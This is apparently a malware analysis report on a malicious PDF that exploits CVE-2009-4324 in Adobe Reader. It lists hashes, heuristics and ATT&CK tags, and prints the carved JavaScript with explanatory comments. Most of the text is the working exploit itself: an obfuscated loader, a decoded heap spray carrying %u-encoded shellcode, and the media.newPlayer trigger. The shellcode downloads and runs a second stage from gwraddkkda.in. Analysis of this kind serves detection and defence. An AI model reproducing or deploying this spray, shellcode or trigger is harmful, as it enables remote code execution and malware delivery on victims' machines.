Malicious PDF — malware analysis report

Static analysis result for SHA-256 3edbc271218a888f…

MALICIOUS

PDF

21.4 KB First seen: 2026-05-10
MD5: 18de53ed99749850d9ebb3bf0442210f SHA-1: c967374b527047d1a2fdb47ff65352ca88e58139 SHA-256: 3edbc271218a888fd827184ca33c216520252fdff3e7ce349dcfb506561887d0
150 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains embedded JavaScript that leverages the CVE-2009-4324 vulnerability via the media.newPlayer API. This script is designed to download and execute a second-stage payload from the URL http://gwraddkkda.in/new/post.php?e=8&&. The obfuscated JavaScript and the exploit trigger strongly indicate malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 6

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://gwraddkkda.in/new/post.php?e=8&& Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

Filename  Kind  Source  Size
javascript_obj0008_000.js pdf-javascript-stream PDF /JS object 8 at offset 0x1E7 2205 bytes
SHA-256: 023a7a663078abe42d6fe316d3daf73a3dd56169b96ff922ab83eb7f09f8e99b
Preview script
First 1,000 lines of the extracted script
// Obfuscation helper of the first (annotation) stage: returns single characters
// that the loader below concatenates into Acrobat API names, so that none of
// those names appear as string literals in the stream. Every /*iiosooosoos*/
// comment is filler with no effect. Returns undefined for any other argument.
function dddsddsgdrvssafdgddddd(iiosooosoos)
{
// 1: second character of app.viewerType (presumably "e" for a viewer string
//    such as "Reader" -- cannot be confirmed from the stream alone).
if(iiosooosoos ==1/*iiosooosoos*/) return ( /*iiosooosoos*/  ""+ /*iiosooosoos*/    app["v"+"ie"/*iiosooosoos*/+""/*iiosooosoos*/+"werType"][1] /*iiosooosoos*/   );
// 2: the literal "%" ("%x" with the x removed).
if(iiosooosoos ==2/*iiosooosoos*/) return (  /*iiosooosoos*/ ""+  /*iiosooosoos*/   "%x".replace(/x/,"")  /*iiosooosoos*/  );
// 3: the literal "a" ("ax" with the x removed).
if(iiosooosoos ==3/*iiosooosoos*/) return ( /*iiosooosoos*/  ""+  /*iiosooosoos*/      "ax".replace(/x/,"") /*iiosooosoos*/);
}

// First-stage loader. It assembles API names from the character table below
// (bracket access plus concatenation, which is why a literal-string signature
// for eval/unescape does not fire on this stream -- the report's rule matched
// only after deobfuscation), reads an encoded string out of the document's
// first annotation, decodes it with two unescape() passes and eval()s it.
// All /*iiosooosoos*/ comments are filler.
// Alias for the global (document script) object.
var /*iiosooosoos*/CedYCrmQEh77/*iiosooosoos*/ = /*iiosooosoos*/this/*iiosooosoos*/; /*iiosooosoos*/

// Character table: [1] = app.viewerType[1] (presumably "e" -- confirm), [2] = "%",
// [3] = "a", [6..15] = o s c i g t r u n p; the remaining slots are empty strings.
var QYSfWAfEQw89 =["",dddsddsgdrvssafdgddddd(1),dddsddsgdrvssafdgddddd(2),dddsddsgdrvssafdgddddd(3),"","","o","s","c","i","g","t","r","u","n","p"];
/*iiosooosoos*/

// Alias for the Acrobat app object.
var /*iiosooosoos*/CedYCrmQEh77z/*iiosooosoos*/ =/*iiosooosoos*/ app/*iiosooosoos*/; /*iiosooosoos*/
// aMcarqtadB1 is the viewerType character (used wherever an "e" is needed); HkkMJqekLq3 is "%".
var aMcarqtadB1 = QYSfWAfEQw89[1];
var HkkMJqekLq3 = QYSfWAfEQw89[2];
// this[<c> + "v" + "a" + "l"]: with <c> == "e" this resolves to the global eval.
var cRQuzDvGhR17 = CedYCrmQEh77[aMcarqtadB1+"v"+QYSfWAfEQw89[3]+"l"];
// this["u" + "n" + <c> + "s" + "c" + "a" + "p" + <c>]: with <c> == "e" this resolves to unescape.
var zVPoARTEkc18 = CedYCrmQEh77[QYSfWAfEQw89[13]+QYSfWAfEQw89[14]+aMcarqtadB1+"s"+QYSfWAfEQw89[8]+QYSfWAfEQw89[3]+QYSfWAfEQw89[15]+aMcarqtadB1];


// eval("var nxoeBeDTJB15 = /scc/ig;") -- defines the marker regex used by the
// replace() call further down ("scc" is the repeated marker in the object 7 stream).
cRQuzDvGhR17("v"+QYSfWAfEQw89[3]+"r nxoeBeDTJB15 = /"+QYSfWAfEQw89[7]+QYSfWAfEQw89[8]+QYSfWAfEQw89[8]+"/"+QYSfWAfEQw89[9]+QYSfWAfEQw89[10]+";");

// app["d" + "o" + "c"] -> app.doc (table[6] = "o", table[8] = "c").
var cgERnZTqVc10 = CedYCrmQEh77z[/*iiosooosoos*/     "d"+QYSfWAfEQw89[7-1]+QYSfWAfEQw89[7+1]];

// doc["s"+"yn"+"c"+"A"+"n"+"n"+"o"+"t"+"S"+"c"+"a"+"n"]() -> doc.syncAnnotScan(),
// forcing the annotation list to be populated before it is read.
cgERnZTqVc10[QYSfWAfEQw89[7]+"yn"+QYSfWAfEQw89[8]+"A"+QYSfWAfEQw89[14]+QYSfWAfEQw89[14]+"o"+QYSfWAfEQw89[11]+"S"+QYSfWAfEQw89[8]+QYSfWAfEQw89[3]+"n"]();

// doc["g"+<c>+"tAnn"+"o"+"t"+"s"](0) -> doc.getAnnots(0): annotations of page 0.
var HmCjNuaGVE4 = cgERnZTqVc10[QYSfWAfEQw89[10]+aMcarqtadB1+"tAnn"+QYSfWAfEQw89[6]+QYSfWAfEQw89[11]+QYSfWAfEQw89[7]](0);

// annots[0]["s"+"ubj"+<c>+"c"+"t"] -> the first annotation's subject field,
// which carries the encoded second stage (the data lives in the annotation,
// not in this script).
var IkJPNddvQz5 = HmCjNuaGVE4[0][QYSfWAfEQw89[7]+"ubj"+aMcarqtadB1+QYSfWAfEQw89[8]+QYSfWAfEQw89[11]];

// subject["r"+<c>+"p"+"l"+"a"+"c"+<c>](/scc/ig, "%") -> subject.replace(/scc/ig, "%"):
// every "scc" marker becomes "%", yielding a doubly percent-encoded string.
// The object 7 stream on this page starts "scc25scc30scc41scc25scc37scc36..."
// and under this scheme appears to decode to the start of legacy_pdfkit_stage_000.js.
var QXkAjtrOeC6 = IkJPNddvQz5/*iiosooosoos*/[QYSfWAfEQw89/*iiosooosoos*/[11+1]+aMcarqtadB1+/*iiosooosoos*/QYSfWAfEQw89[15]+"l"/*iiosooosoos*/+QYSfWAfEQw89/*iiosooosoos*/[3]+QYSfWAfEQw89/*iiosooosoos*/[8]+aMcarqtadB1]/*iiosooosoos*/(nxoeBeDTJB15,HkkMJqekLq3);

// unescape(unescape(...)) undoes the double encoding, then eval() runs the result.
var ElpHVCCwJX7=zVPoARTEkc18(zVPoARTEkc18(QXkAjtrOeC6));
cRQuzDvGhR17(ElpHVCCwJX7);

// Trigger block. j, util, vvv, vvv2, vvv3 and vvv4 are not defined anywhere in this
// stream; the decoded second stage (legacy_pdfkit_stage_000.js on this page) defines
// names with exactly these identifiers (vvv2 = "printd", vvv3 = "newPlayer",
// vvv4 = "media"), so after that stage has run this reads as util.printd(vvv, new Date())
// twice, then media.newPlayer(null) -- the CVE-2009-4324 call the report flags --
// then util.printd once more. If j was never set the whole block is skipped.
if(j){
function run(){util[vvv2](vvv, new Date());}
run();run();
// The empty catch hides any script error from the viewer so the user sees nothing.
try {this[vvv4][vvv3](null);} catch(e) {}
run();
}
javascript_obj0008_001.js pdf-javascript-stream PDF /JS object 8 at offset 0x209 21353 bytes
SHA-256: 2f1d52c70d19d63051c7a11fdc28be8107214428915ce8103320a9abea4a4962
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
// Obfuscation helper of the first (annotation) stage: returns single characters
// that the loader below concatenates into Acrobat API names, so that none of
// those names appear as string literals in the stream. Every /*iiosooosoos*/
// comment is filler with no effect. Returns undefined for any other argument.
function dddsddsgdrvssafdgddddd(iiosooosoos)
{
// 1: second character of app.viewerType (presumably "e" for a viewer string
//    such as "Reader" -- cannot be confirmed from the stream alone).
if(iiosooosoos ==1/*iiosooosoos*/) return ( /*iiosooosoos*/  ""+ /*iiosooosoos*/    app["v"+"ie"/*iiosooosoos*/+""/*iiosooosoos*/+"werType"][1] /*iiosooosoos*/   );
// 2: the literal "%" ("%x" with the x removed).
if(iiosooosoos ==2/*iiosooosoos*/) return (  /*iiosooosoos*/ ""+  /*iiosooosoos*/   "%x".replace(/x/,"")  /*iiosooosoos*/  );
// 3: the literal "a" ("ax" with the x removed).
if(iiosooosoos ==3/*iiosooosoos*/) return ( /*iiosooosoos*/  ""+  /*iiosooosoos*/      "ax".replace(/x/,"") /*iiosooosoos*/);
}

// First-stage loader (this preview is identical to the one shown for
// javascript_obj0008_000.js). It assembles API names from the character table
// below (bracket access plus concatenation, which is why a literal-string
// signature for eval/unescape does not fire on this stream -- the report's rule
// matched only after deobfuscation), reads an encoded string out of the
// document's first annotation, decodes it with two unescape() passes and eval()s it.
// All /*iiosooosoos*/ comments are filler.
// Alias for the global (document script) object.
var /*iiosooosoos*/CedYCrmQEh77/*iiosooosoos*/ = /*iiosooosoos*/this/*iiosooosoos*/; /*iiosooosoos*/

// Character table: [1] = app.viewerType[1] (presumably "e" -- confirm), [2] = "%",
// [3] = "a", [6..15] = o s c i g t r u n p; the remaining slots are empty strings.
var QYSfWAfEQw89 =["",dddsddsgdrvssafdgddddd(1),dddsddsgdrvssafdgddddd(2),dddsddsgdrvssafdgddddd(3),"","","o","s","c","i","g","t","r","u","n","p"];
/*iiosooosoos*/

// Alias for the Acrobat app object.
var /*iiosooosoos*/CedYCrmQEh77z/*iiosooosoos*/ =/*iiosooosoos*/ app/*iiosooosoos*/; /*iiosooosoos*/
// aMcarqtadB1 is the viewerType character (used wherever an "e" is needed); HkkMJqekLq3 is "%".
var aMcarqtadB1 = QYSfWAfEQw89[1];
var HkkMJqekLq3 = QYSfWAfEQw89[2];
// this[<c> + "v" + "a" + "l"]: with <c> == "e" this resolves to the global eval.
var cRQuzDvGhR17 = CedYCrmQEh77[aMcarqtadB1+"v"+QYSfWAfEQw89[3]+"l"];
// this["u" + "n" + <c> + "s" + "c" + "a" + "p" + <c>]: with <c> == "e" this resolves to unescape.
var zVPoARTEkc18 = CedYCrmQEh77[QYSfWAfEQw89[13]+QYSfWAfEQw89[14]+aMcarqtadB1+"s"+QYSfWAfEQw89[8]+QYSfWAfEQw89[3]+QYSfWAfEQw89[15]+aMcarqtadB1];


// eval("var nxoeBeDTJB15 = /scc/ig;") -- defines the marker regex used by the
// replace() call further down ("scc" is the repeated marker in the object 7 stream
// that follows this script in the carved artifact).
cRQuzDvGhR17("v"+QYSfWAfEQw89[3]+"r nxoeBeDTJB15 = /"+QYSfWAfEQw89[7]+QYSfWAfEQw89[8]+QYSfWAfEQw89[8]+"/"+QYSfWAfEQw89[9]+QYSfWAfEQw89[10]+";");

// app["d" + "o" + "c"] -> app.doc (table[6] = "o", table[8] = "c").
var cgERnZTqVc10 = CedYCrmQEh77z[/*iiosooosoos*/     "d"+QYSfWAfEQw89[7-1]+QYSfWAfEQw89[7+1]];

// doc["s"+"yn"+"c"+"A"+"n"+"n"+"o"+"t"+"S"+"c"+"a"+"n"]() -> doc.syncAnnotScan(),
// forcing the annotation list to be populated before it is read.
cgERnZTqVc10[QYSfWAfEQw89[7]+"yn"+QYSfWAfEQw89[8]+"A"+QYSfWAfEQw89[14]+QYSfWAfEQw89[14]+"o"+QYSfWAfEQw89[11]+"S"+QYSfWAfEQw89[8]+QYSfWAfEQw89[3]+"n"]();

// doc["g"+<c>+"tAnn"+"o"+"t"+"s"](0) -> doc.getAnnots(0): annotations of page 0.
var HmCjNuaGVE4 = cgERnZTqVc10[QYSfWAfEQw89[10]+aMcarqtadB1+"tAnn"+QYSfWAfEQw89[6]+QYSfWAfEQw89[11]+QYSfWAfEQw89[7]](0);

// annots[0]["s"+"ubj"+<c>+"c"+"t"] -> the first annotation's subject field,
// which carries the encoded second stage (the data lives in the annotation,
// not in this script).
var IkJPNddvQz5 = HmCjNuaGVE4[0][QYSfWAfEQw89[7]+"ubj"+aMcarqtadB1+QYSfWAfEQw89[8]+QYSfWAfEQw89[11]];

// subject["r"+<c>+"p"+"l"+"a"+"c"+<c>](/scc/ig, "%") -> subject.replace(/scc/ig, "%"):
// every "scc" marker becomes "%", yielding a doubly percent-encoded string.
// The object 7 stream below starts "scc25scc30scc41scc25scc37scc36..." and under
// this scheme appears to decode to the start of legacy_pdfkit_stage_000.js.
var QXkAjtrOeC6 = IkJPNddvQz5/*iiosooosoos*/[QYSfWAfEQw89/*iiosooosoos*/[11+1]+aMcarqtadB1+/*iiosooosoos*/QYSfWAfEQw89[15]+"l"/*iiosooosoos*/+QYSfWAfEQw89/*iiosooosoos*/[3]+QYSfWAfEQw89/*iiosooosoos*/[8]+aMcarqtadB1]/*iiosooosoos*/(nxoeBeDTJB15,HkkMJqekLq3);

// unescape(unescape(...)) undoes the double encoding, then eval() runs the result.
var ElpHVCCwJX7=zVPoARTEkc18(zVPoARTEkc18(QXkAjtrOeC6));
cRQuzDvGhR17(ElpHVCCwJX7);

// Trigger block. j, util, vvv, vvv2, vvv3 and vvv4 are not defined anywhere in this
// stream; the decoded second stage (legacy_pdfkit_stage_000.js on this page) defines
// names with exactly these identifiers (vvv2 = "printd", vvv3 = "newPlayer",
// vvv4 = "media"), so after that stage has run this reads as util.printd(vvv, new Date())
// twice, then media.newPlayer(null) -- the CVE-2009-4324 call the report flags --
// then util.printd once more. If j was never set the whole block is skipped.
if(j){
function run(){util[vvv2](vvv, new Date());}
run();run();
// The empty catch hides any script error from the viewer so the user sees nothing.
try {this[vvv4][vvv3](null);} catch(e) {}
run();
}
endstream
endobj
7 0 obj
<<
/Length 18840
>>
stream
scc25scc30scc41scc25scc37scc36scc25scc36scc31scc25scc37scc32scc25scc32scc30scc25scc36scc31scc25scc35scc30scc25scc36scc43scc25scc37scc35scc25scc36scc37scc25scc36scc39scc25scc36scc45scc25scc37scc33scc25scc32scc30scc25scc33scc44scc25scc32scc30scc25scc36scc31scc25scc37scc30scc25scc37scc30scc25scc32scc45scc25scc37scc30scc25scc36scc43scc25scc37scc35scc25scc36scc37scc25scc34scc39scc25scc36scc45scc25scc37scc33scc25scc33scc42scc25scc30scc41scc25scc36scc36scc25scc36scc46scc25scc37scc32scc25scc32scc30scc25scc32scc38scc25scc37scc36scc25scc36scc31scc25scc37scc32scc25scc32scc30scc25scc36scc39scc25scc33scc44scc25scc33scc30scc25scc33scc42scc25scc32scc30scc25scc36scc39scc25scc32scc30scc25scc33scc43scc25scc32scc30scc25scc36scc31scc25scc35scc30scc25scc36scc43scc25scc37scc35scc25scc36scc37scc25scc36scc39scc25scc36scc45scc25scc37scc33scc25scc32scc45scc25scc36scc43scc25scc36scc35scc25scc36scc45scc25scc36scc37scc25scc37scc34scc25scc36scc38scc25scc33scc42scc25scc32scc30scc25scc36scc39scc25scc32scc42scc25scc32scc42scc25scc32scc39scc25scc37scc42scc25scc30scc41scc25scc36scc39scc25scc36scc36scc25scc32scc30scc25scc32scc38scc25scc36scc31scc25scc35scc30scc25scc36scc43scc25scc37scc35scc25scc36scc37scc25scc36scc39scc25scc36scc45scc25scc37scc33scc25scc35scc42scc25scc36scc39scc25scc35scc44scc25scc32scc45scc25scc36scc45scc25scc36scc31scc25scc36scc44scc25scc36scc35scc25scc33scc44scc25scc33scc44scc25scc32scc32scc25scc34scc35scc25scc35scc33scc25scc36scc33scc25scc37scc32scc25scc36scc39scc25scc37scc30scc25scc37scc34scc25scc32scc32scc25scc32scc39scc25scc37scc42scc25scc37scc36scc25scc36scc31scc25scc37scc32scc25scc32scc30scc25scc36scc43scc25scc37scc36scc25scc33scc44scc25scc36scc31scc25scc35scc30scc25scc36scc43scc25scc37scc35scc25scc36scc37scc25scc36scc39scc25scc36scc45scc25scc37scc33scc25scc35scc42scc25scc36scc39scc25scc35scc44scc25scc32scc45scc25scc37
... (truncated)
legacy_pdfkit_stage_000.js deobfuscated-js repeated-marker hex decoded JavaScript at offset 0xAB8 1256 bytes
SHA-256: c3df0b6d669953258363ab802ac0d32c63d5685d76eb2e0ad1f70f86b924f691
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
// Second stage, as decoded by the analyzer from the "scc" marker encoding.
// It gates on the EScript plug-in version, fills memory with a repeated
// padding+shellcode string, and defines the aliases that the first stage's
// trigger block dereferences (util.printd / media.newPlayer).
var aPlugins = app.plugIns;
// Locate the "EScript" (JavaScript engine) plug-in and record its version; lv stays
// undefined when no such plug-in is present.
for (var i=0; i < aPlugins.length; i++){
if (aPlugins[i].name=="EScript"){var lv=aPlugins[i].version;}}
// Version gating: j (the number of spray slots) is set only for 9 < lv < 9.3 or
// 8.12 < lv < 8.2. Outside those windows j stays undefined and the first stage's
// `if(j)` block never runs, so the sample is inert on other viewer versions --
// relevant when reproducing behaviour in a sandbox.
if ((lv>9)&&(lv<9.3)){var j=1400;} else if((lv>8.12)&&(lv<8.2)){var j=2900;}else{}
// s is assigned without var and therefore becomes a global.
s=new Array();
// sh: %uXXXX-encoded shellcode. Its tail (%u7468%u7074%u2F3A ...) is the little-endian
// UTF-16 form of the download URL the report lists under PDF_JS_SHELLCODE_DOWNLOAD_URL
// and EMBEDDED_URL; this is the string a network IOC / YARA rule should key on.
var sh = "%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u672F%u7277%u6461%u6B64%u646B%u2E61%u6E69%u6E2F%u7765%u702F%u736F%u2E74%u6870%u3F70%u3D65%u2638%u0026";
// str: 0x9090 filler, doubled until it exceeds 0x8000 UTF-16 units, then trimmed so
// that str + sh is exactly 0x8000 units. Each of the j array slots receives one copy;
// this repeated padding+shellcode block layout is the classic heap-spray pattern
// (identical large strings in an array is a useful dynamic-analysis indicator).
var str="%u9090%u9090";
sh=unescape(sh);str=unescape(str);
while(str.length <= 0x8000) {str+=str;}
str=str.substr(0,0x8000 - sh.length);
for(i=0;i<j;i++) {s[i]=str + sh;}
// Aliases consumed by the first stage: util[vvv2](vvv, new Date()) becomes
// util.printd(vvv, date), and this[vvv4][vvv3](null) becomes media.newPlayer(null),
// the CVE-2009-4324 call the report scores as critical. vvv is the format string
// handed to printd; its role beyond being that argument cannot be confirmed here.
var vvv = "p@111111111111111111111111 : yyyy111";
var vvv2 = "printd";
var vvv3 = "newPlayer";
var vvv4 = "media";
legacy_pdfkit_stage_001.js deobfuscated-js cross-stage annotation API aliases at offset 0x1E7 81 bytes
SHA-256: 42025b552c7960b53abcd8cd732b01c8d109eccfdfefc352b9826c4d5807d414
Preview script
First 1,000 lines of the extracted script
// Analyzer reconstruction, not a carved executable: the first stage's
// this[vvv4][vvv3](null) with vvv4 = "media" and vvv3 = "newPlayer" substituted
// from the decoded second stage. This resolved call is what the CVE_2009_4324
// heuristic in the report matched on.
media.newPlayer(null); /* alias values recovered from decoded annotation stage */